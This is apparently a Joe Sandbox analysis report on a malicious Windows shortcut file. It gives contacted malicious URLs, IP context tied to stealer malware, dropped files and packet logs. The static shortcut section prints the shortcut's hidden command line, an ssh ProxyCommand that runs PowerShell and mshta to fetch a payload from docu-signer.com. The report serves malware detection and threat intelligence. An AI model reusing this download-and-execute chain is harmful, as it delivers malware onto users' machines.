                https://docu-signer.com/api/uz/0912545164/index.mp4ymshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://docu-signer.com/api/uz/0912545164/index.mp4xmshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637zmshta.exe, 00000005.00000002.2676736474.00000178AC599000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637ent(mshta.exe, 00000005.00000002.2676736474.00000178AC53C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.1483836146.0000025E2B360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                  		high
                  http://crl.ver)svchost.exe, 00000007.00000002.2680213004.0000025E2B610000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.cloudflare.com/5xx-error-landingmshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZdssh.exe, 00000001.00000002.2676527197.000002931A8C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, DypA6KbLrn.lnktrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://docu-signer.com/cdn-cgi/phish-bypassmshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://docu-signer.com/api/uz/0912545164/index.mp4Rmshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                        		high
                        https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637amshta.exe, 00000005.00000002.2682717479.00000180B392C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637fnmshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://docu-signer.com/api/uz/0912545164/index.mp4cpowershell.exe, 00000004.00000002.1464783976.000002A853C50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...omshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://docu-signer.com/cdn-cgi/phish-bypassQmshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637mmshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000004.00000002.1462404136.000002A83B9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1462404136.000002A83BA01000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...xmshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637rgmshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/mshta.exe, 00000005.00000002.2676736474.00000178AC599000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://docu-signer.com/api/uz/0912545164/index.mp4hmshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://docu-signer.com/api/uz/0912545164/index.mp4fmshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...umshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.21.87.65
                              		docu-signer.comUnited States
                              		13335CLOUDFLARENETUStrue

                              Private

                              IP
                              127.0.0.1

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1582824
                              Start date and time:2024-12-31 15:40:29 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 43s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:DypA6KbLrn.lnk
                              renamed because original name is a hash value
                              Original Sample Name:25e7cee7a15413a5171636165e0e0473.lnk
                              Detection:MAL
                              Classification:mal80.winLNK@9/11@1/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 5
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .lnk

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target mshta.exe, PID 7764 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: DypA6KbLrn.lnk

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              09:41:50API Interceptor2x Sleep call for process: svchost.exe modified
                              09:41:50API Interceptor1x Sleep call for process: mshta.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.21.87.65payload_1.htaGet hashmaliciousRedLineBrowse
                                SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                  fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    docu-signer.compayload_1.htaGet hashmaliciousRedLineBrowse
                                    • 104.21.87.65
                                    SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                    • 104.21.87.65

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                    • 172.67.139.222
                                    tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                    • 188.114.96.3
                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                    • 104.21.85.189
                                    Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                    • 172.67.196.114
                                    Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.12.205
                                    MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                    • 162.159.61.3
                                    MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                    • 172.64.41.3
                                    5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                    • 104.21.96.1
                                    zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.112.1
                                    2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.64.1

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    setup.msiGet hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    6684V5n83w.exeGet hashmaliciousVidarBrowse
                                    • 104.21.87.65
                                    heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                    • 104.21.87.65
                                    zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    Loader.exeGet hashmaliciousMeduza StealerBrowse
                                    • 104.21.87.65
                                    setup.msiGet hashmaliciousUnknownBrowse
                                    • 104.21.87.65
                                    BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                    • 104.21.87.65

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7067238271017605
                                    Encrypted:false
                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqG:2JIB/wUKUKQncEmYRTwh0y
                                    MD5:DCF899FFF7B72EBB6EB5806D330D2C3C
                                    SHA1:1745114D3D4643AC01C32B7B875984BAE2046AA5
                                    SHA-256:787AA56467E9A7D39BC552F411AC17C2E63CDF604AA8378A95EA577137109D39
                                    SHA-512:982D443926E73BC31792584C11BB6DA4E117DC24709CA2834E3B6C749C800CA3E1CB955E65BF6E37033B9F7724ADF22F3B5A29D7F860911176A4251C41A07352
                                    Malicious:false
                                    Reputation:low
                                    Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1eaa2214, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.790044261279129
                                    Encrypted:false
                                    SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
                                    MD5:B22A09433F2DDB7E2C69FF462824A1AB
                                    SHA1:81E38A11F3882928BE405E7DA594957E5BF9C3A3
                                    SHA-256:C1259A631ED9193D386E544D0EE626DDEA13C66E32910DFC5A055EF96623DEED
                                    SHA-512:823FFACCAC39E746ADF15E8DC90A80C77AD780B50C555627098C9FFEE6F50340E792473566AF4CFBAE6EA8B2AE392B46EA63FB964310135D65B0BECD8329B476
                                    Malicious:false
                                    Reputation:low
                                    Preview:..".... ...............X\...;...{......................0.`.....42...{5.2)...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................0r2)...|.....................~2)...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08223264547788528
                                    Encrypted:false
                                    SSDEEP:3:6iWlllKYeg071t/57Dek3Jiaq6CDlAllEqW3l/TjzzQ/t:6NlllKz/7HR3tiL55Amd8/
                                    MD5:7E1FAE2EB810788DA73D33149E1144F6
                                    SHA1:08D23C6AC2932FB8ED4D6066B7999FCE0686A9A7
                                    SHA-256:C057227BF35871356DF799678DCB5AC1C0B6579B345614956DD61494900864C8
                                    SHA-512:2635FA00848354D8942B8D609D465576BE29242480C00D1006A34AA9DB785DB584D9AFEA314B3031409CA4C2555B853E47B57017567BD4E4C10A525E715055E6
                                    Malicious:false
                                    Reputation:low
                                    Preview:.........................................;...{..2)...|..42...{5.........42...{5.42...{5...Y.42...{59...................~2)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cf.errors[1].css

                                    Download File
                                    Process:C:\Windows\System32\mshta.exe
                                    File Type:ASCII text, with very long lines (24050)
                                    Category:dropped
                                    Size (bytes):24051
                                    Entropy (8bit):4.941039417164537
                                    Encrypted:false
                                    SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                    MD5:5E8C69A459A691B5D1B9BE442332C87D
                                    SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                    SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                    SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\icon-exclamation[1].png

                                    Download File
                                    Process:C:\Windows\System32\mshta.exe
                                    File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):452
                                    Entropy (8bit):7.0936408308765495
                                    Encrypted:false
                                    SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                    MD5:C33DE66281E933259772399D10A6AFE8
                                    SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                    SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                    SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                    Malicious:false
                                    Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.773832331134527
                                    Encrypted:false
                                    SSDEEP:3:Nlllulqllll/:NllUql/
                                    MD5:49FAEE31B2AE8B15DA007BA9D5577E99
                                    SHA1:DE0C238EAED882225C0057884A0524C60CBBF35D
                                    SHA-256:518A64E432AF799C48413F1EBDB4249F810C00BAE3ADD0C0CC34BDA3AF9B6C81
                                    SHA-512:324B7C72B7598A81BACDE122AF35CD72BB4CEAE2A43A03F11D7DB5D570BAA88DF7811F3E451285537CE6F770C21DE3392DBBB10CFD9A29CD30D4BE88DA6275DE
                                    Malicious:false
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apgduuv1.a1z.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbyxxrzm.wvp.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxizy21x.1xf.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4oexvbk.ynp.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                    Static File Info

                                    General

                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Tue Mar 12 19:03:11 2024, mtime=Mon Jun 17 15:01:49 2024, atime=Tue Mar 12 19:03:11 2024, length=450560, window=hidenormalshowminimized
                                    Entropy (8bit):3.1071405136166086
                                    TrID:
                                    • Windows Shortcut (20020/1) 100.00%
                                    File name:DypA6KbLrn.lnk
                                    File size:2'702 bytes
                                    MD5:25e7cee7a15413a5171636165e0e0473
                                    SHA1:abace591e3418a1b64cc38f37851b7b4da7347cf
                                    SHA256:4ae7c304075927398c65e980aa93f181d18dcf52265f6acc82e530d46ffc7ba4
                                    SHA512:bee3edd9fbcce29a7b48700c9cff07b63ee9e81ca7701ff65c5558bb114f9a561df64aa55b8fffff081bfba8355fa248b2b0536b0aee81e0e43e80ac0c92b2fa
                                    SSDEEP:24:8V/BF//ZrQ9HYWGt1v+/+G6AWbUk20xZvmyw5LkddpBpB19dsHhWUIeFIU:8FLZrCCG6AaUk1uywVkdbBpB19Z5W
                                    TLSH:085157103AE90B14F7B34B349476A320C57BBC06EDB14B1E004D51886B67A55E5B5F7F
                                    File Content Preview:L..................F.@.. ......O.t...6a........O.t...............................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                    File Icon

                                    Icon Hash:72d282828e8d8dd5

                                    Static Windows Shortcut Info

                                    General

                                    Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                    Command Line Argument: -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
                                    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 15:41:49.015028000 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.015090942 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.015160084 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.049557924 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.049591064 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.527457952 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.527575016 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.651422024 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.651453972 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.651835918 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.651905060 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.653469086 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.699340105 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.755829096 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.755875111 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.755908012 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.755930901 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.755948067 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.755970001 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.755991936 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.756011963 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.756016970 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.756026983 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.756081104 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.762646914 CET49706443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.762675047 CET44349706104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.769836903 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.769912004 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:49.770020008 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.770277977 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:49.770298004 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.225982904 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.226056099 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.226516962 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.226531029 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.226825953 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.226833105 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.351628065 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.351689100 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.351700068 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.351711988 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.351743937 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.351773024 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.351779938 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.351823092 CET49707443192.168.2.7104.21.87.65
